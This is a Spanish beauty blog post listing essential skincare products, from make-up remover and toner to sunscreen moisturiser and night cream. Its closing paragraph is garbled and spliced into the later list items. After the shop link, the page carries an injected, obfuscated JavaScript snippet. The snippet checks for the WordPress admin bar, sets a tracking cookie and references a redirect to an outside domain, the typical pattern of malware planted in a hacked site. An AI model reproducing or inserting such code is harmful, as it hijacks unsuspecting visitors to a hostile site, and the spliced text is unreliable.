Todas tenemos una serie de productos de cosmética y cuidados personales que nunca pueden faltar en nuestro neceser o cuarto de baño me refiero a: LOS IMPRESCINDIBLES DE BELLEZA.

Probablemente nunca pueda salir de cada sin aplicar máscara en tus pestañas, un poco de colorete en tus mejillas o sin una buena crema hidratante con factor de protección solar… así que a continuación te mostramos algunos productos que siempre tienen que formar parte de los básicos de tu plan de belleza diario:

LOS MEJORES PRODUCTOS DE BELLEZA

    • Desmaquillante de ojos y labios: Es recomendable desmaquillar siempre la zona del rostro con un desmaquillante específico a las zonas más delicadas del cutis. Desmaquilla de forma suave ayudándote con un algodón. Es muy importante usar estos productos aunque no te maquilles pues tu rostro se ensucia a diario con la contaminación.

    • Leche limpiadora: Puedes utilizar jabones o desmaquillantes indicados para el cutis, pero es importante que te acostumbres a limpiar tu rostro cada día con este producto ya que elimina la suciedad, el exceso de gracia o  las células muertas.

 

    • Tónico: Produce una sensación de frescor, equilibra el PH de la piel y hace que las cremas se absorban mejor y penetren más rápidamente en la piel. Hay diferentes tipos de tónico según el tipo de piel: calmantes, astringentes, anti-resecamiento…

    • Exfoliante (rostro y cuerpo): El exfoliante ayuda a eliminar las células muertas de la piel y suaviza la piel en minutos. Hay diferentes exfoliantes según el tipo de piel y todos contiene unos gránulos que limpian e hidratan la piel. Utiliza tu exfoliante 1 o 2 veces por semana, no lo usas más pues notarás que tu piel se reseca.

    • Contorno de ojos hidratante: Este producto hidrata la zona inferior del ojo donde se forman las bolsas y ojeras. Con un buen contorno de los ojos podrás reducir arrugas de expresión y  bolsas y aclarar las ojeras. Además, es conveniente usarlo antes de aplicar el corrector, para evitar que se cuartee y conseguir que el maquillaje dure más.

    • Crema hidratante (con protección solar): Es imprescindible aplicar una crema hidratante por el rostro y cuello antes de maquillarte o simplemente de salir a la calle. La crema hidratante es perfecta para dar luminosidad  e hidratación a la piel, pero también para proteger tu rostro de los agentes externos. Procura utilizar una hidratante con factor de protección solar, pues aunque sea invierno, los rayos del sol inciden con mucha fuerza provocando el envejecimiento prematuro de la piel.

    •  

Si bien es cierto que estos productos son los más importantes, según tus necesidades puedes seleccionar uno u otros o quizás por tu tipo de piel uses un tipo de ingrediente o acabado diferentes para tus imprescindibles de belleza. Aunque creas que tener todo estos productos supone una elevada inversión, ten en cuenta que suelen durar bastante y que tu piel te lo agradecerá. Haz la prueba y observa cómo tu piel se va lle

    • Crema nutritiva de noche: La crema nutritiva está indicada para aplicarse antes de dormir una vez que has desmaquillado y limpiado tu rostro, las razones son muy sencillas y es que al aplicarlo por la noche se incrementa la regeneración de las células de la piel, ya que por la noche la renovación celular es más elevada que durante el día y la piel está más receptiva.

  • Leche hidratante corporal hidratante y reafirmante : Cada vez que salgas de la ducha, es muy importante aplicar una leche hidratante corporal para hidratar la piel y mantenerla suave  y cuidada. Estas cremas previenen la sequedad de la piel y actúan de forma inmediata con unos resultados duraderos, alisando y reafirmando progresivamente la piel. Busca la hidratante acorde a tu tipo de piel: seca, sensible, normal, hidratada…nando de luz e hidratación, mostrándose más firme.¡Tendrás siempre una apariencia perfecta!

Puedes encontrar estos productos en nuestra tienda online var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone